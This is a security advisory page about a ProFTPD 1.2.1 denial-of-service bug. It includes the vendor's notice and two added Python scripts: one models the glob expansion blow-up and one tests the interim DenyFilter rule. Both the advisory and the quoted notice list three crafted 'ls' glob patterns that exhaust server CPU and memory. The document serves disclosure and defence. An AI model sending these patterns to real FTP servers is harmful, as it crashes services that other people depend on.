SecurityTracker.com

SecurityTracker
Archives




Category:   Application (File Transfer/Sharing)  >   ProFTPD
Vendors:   ProFTPD
ProFTPD Denial of Service Vulnerability Allows Remote Users to Crash the FTP Process or the Entire Server
SecurityTracker Alert ID:  1001114
SecurityTracker URL:  http://securitytracker.com/id/1001114
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 19 2001
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.2.1; earlier versions likely
Description:   The vendor has confirmed that ProFTPD is vulnerable to a remote denial of service. A logged-in user (including an anonymous user, where anonymous access is enabled) can request a directory listing (typed as ls in an FTP client, sent to the server as LIST or NLST) whose argument is a pathological glob pattern. The daemon expands the pattern server-side and exhausts CPU and memory, so that either the FTP process or the whole server crashes.

Commands that may cause this condition include:

ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
ls */.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/
ls .*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/

The vendor reports that other commands of the same style also trigger the condition; the exact patterns above are not required.

This issue has been assigned ProFTPD Bug ID: 1066. See:
http://bugs.proftpd.org/show_bug.cgi?id=1066

Impact:   A remote user can cause a ProFTPD daemon process to consume all CPU and memory available to it; several such sessions in parallel deplete the resources faster, crashing either the process or the server.
Solution:   The vendor is preparing a patch against the 1.2.1 source. Until it is released, the vendor recommends adding the directive DenyFilter \*.*/ in the <Global> context, which catches most variants of the problem patterns, and starting the daemon under appropriate ulimits so that a single daemon cannot exhaust the system (see the source message below).
Vendor URL:  www.proftpd.org
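Why patterns of this shape are expensive, as an added example (not part of this alert and not ProFTPD code): every "*" segment enumerates a directory, each "/.." steps back into the directory just enumerated, and the next "*" enumerates it again once for every earlier match, so the result set multiplies by the directory width at each repetition. The script below reproduces that growth on a constructed directory tree using Python's glob module as a stand-in for ProFTPD's own matcher; the two differ in detail (for example in how dot-files are handled), so this shows the shape of the blow-up, not its exact cost inside ProFTPD. All directory names, widths and counts are constructed for the example.

```python
"""Reproduce the path-expansion growth behind the advisory's "ls */../*/../*"
pattern on a constructed directory tree (added example, not ProFTPD code)."""
import glob
import os
import shutil
import tempfile


def build_tree(root, width):
    """Constructed fixture: `width` empty subdirectories d0..d{width-1} under root."""
    for i in range(width):
        os.mkdir(os.path.join(root, f"d{i}"))


def attack_pattern(repeats):
    """'*/../' repeated `repeats` times followed by '*', the shape of the
    advisory's first command (which uses 12 repetitions)."""
    return "*/../" * repeats + "*"


def count_matches(root, pattern):
    """Number of paths the pattern expands to when evaluated relative to `root`.

    glob.glob is used as a stand-in for ProFTPD's glob; the chdir keeps the
    example working on Python versions without glob's root_dir parameter."""
    cwd = os.getcwd()
    os.chdir(root)
    try:
        return len(glob.glob(pattern))
    finally:
        os.chdir(cwd)


def expansion_growth(width, max_repeats):
    """Return [(repeats, matches)] for increasingly long patterns on a fresh
    tree of `width` directories.  With k directories, r repetitions of "*/../"
    yield k ** (r + 1) matches: each "*" sees the same k entries again."""
    root = tempfile.mkdtemp(prefix="globdos-")
    try:
        build_tree(root, width)
        return [(r, count_matches(root, attack_pattern(r)))
                for r in range(max_repeats + 1)]
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    # A tree of only 3 directories already grows as 3, 9, 27, 81, ...; the
    # advisory's 12 repetitions on a real anonymous FTP tree is what exhausts
    # the daemon's CPU and memory.
    for repeats, matches in expansion_growth(3, 4):
        print(f"{attack_pattern(repeats)!r:40} -> {matches} matches")
```

The per-match cost is a directory read and a string compare, so the multiplicative growth, not any single expensive step, is what the listed commands exploit; that is also why a ulimit on the daemon's memory and CPU time is a sensible stop-gap even after a code fix.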
Cause:   Input validation error, Resource error

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Debian Package Still Vulnerable) Re: ProFTPD Denial of Service Vulnerability Allows Remote Users to Crash the FTP Process or the Entire Server
A user reports that the version shipped with Debian Linux is still vulnerable.



 Source Message Contents

Subject:  [SECURITY] DoS vulnerability in ProFTPD


ProFTPD Bug ID: 1066
  (http://bugs.proftpd.org/show_bug.cgi?id=1066)


Versions affected:
  ProFTPD 1.2.1 is vulnerable. Earlier versions are also believed to be
  affected.


Problem commands:
  Problem commands include:
  ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
  ls */.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/
  ls .*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/

  Other commands of this style may also cause the same behavior; the exact
  commands listed here are not necessary to trigger it.


Effect:
  The daemon process starts to consume all CPU and memory resources
  available to it.  Multiple simultaneous instances will result in faster
  depletion of resources, causing either the daemon process or the server
  to crash.


Fix / Workaround:
  A patch against the 1.2.1 source is currently being worked on.  However,
  given the nature of the problem and the lack of time given between
  notification and publication of the vulnerability, it is not ready for
  release yet.

  Until a more permanent fix is ready, we recommend adding the following
  directive in the <Global> context which should catch most variants of this
  problem.

  DenyFilter \*.*/

  We also recommend that the daemon process is started with appropriate
  ulimits set to control the system resources that can be utilized by the
  running daemon.  This should help in maintaining a viable server
  regardless of attacks being made.  The development team is looking into
  modifying ProFTPD to provide native ulimit functionality.


Summary:
  The ProFTPD development team is aware of this issue and will be
  looking into providing a proper patch shortly.  Details of any patch
  or new version will be released on http://www.proftpd.org/.

  Additionally, the administrators of ftp.proftpd.org would like to thank
  Frank Denis for testing his theory about the vulnerability by launching a
  denial of service attack against that server, causing it to become
  unavailable for a period of time.

  All security issues regarding ProFTPD should be directed to
  security@proftpd.org. Details on the mailing lists for the ProFTPD
  Project can be found at http://www.proftpd.org/

--
The Flying Hamster <hamster@suespammers.org>         http://hamster.wibble.org/
Everyone who visits a psychiatrist should have his head examined.
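What the interim DenyFilter actually catches, as an added example (not part of the advisory, and not ProFTPD code): the directive's expression, \*.*/, is a regular expression meaning a literal '*' followed anywhere later by a '/'. The script below runs that expression over the three commands quoted in the advisory and over three constructed control strings using Python's re module in place of the POSIX regex engine ProFTPD uses; it assumes, as ProFTPD documents for DenyFilter, that the expression is applied to the command's argument string rather than to the verb. The control commands and their names are constructed for the example.

```python
"""Apply the advisory's interim "DenyFilter \*.*/" expression to its problem
commands and to some controls (added example, not ProFTPD code)."""
import re

# The expression from the advisory's "DenyFilter \*.*/" directive:
# a literal '*' followed, anywhere later in the argument, by a '/'.
DENY_FILTER = r"\*.*/"

# The three commands quoted in the advisory plus three constructed controls.
COMMANDS = {
    "advisory-1": "ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*",
    "advisory-2": "ls */.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/",
    "advisory-3": "ls .*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/",
    "benign-list": "ls -la pub",        # constructed: ordinary listing
    "benign-glob": "ls *.tar.gz",       # constructed: wildcard, but no '/'
    "variant-q": "ls ?/../?/../?/../?",  # constructed: same shape, '?' only
}


def split_command(line):
    """Split a client command line into (VERB, argument string).

    The filter is assumed to be matched against the argument part only."""
    verb, _, args = line.partition(" ")
    return verb.upper(), args


def is_denied(args, deny_filter=DENY_FILTER):
    """True when the argument string matches the DenyFilter expression,
    i.e. the server would refuse the command."""
    return re.search(deny_filter, args) is not None


def classify(commands=COMMANDS):
    """Map each command name to whether the filter would deny it."""
    return {name: is_denied(split_command(line)[1])
            for name, line in commands.items()}


if __name__ == "__main__":
    for name, denied in classify().items():
        print(f"{name:12} {'DENIED' if denied else 'allowed'}")
```

All three advisory commands are denied, while an ordinary listing and a plain "*.tar.gz" wildcard pass, which is why the vendor could recommend the filter without breaking normal use. The "variant-q" control shows the limit the advisory itself acknowledges with "most variants": a pattern built only from '?' never contains a '*', so the expression does not see it at all. Whether such a pattern is as expensive for ProFTPD's expander is not something this advisory states; the point is only that the filter is a substring check on the argument, not a bound on the expansion, which is why the ulimit recommendation accompanies it.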









Copyright 2019, SecurityGlobal.net LLC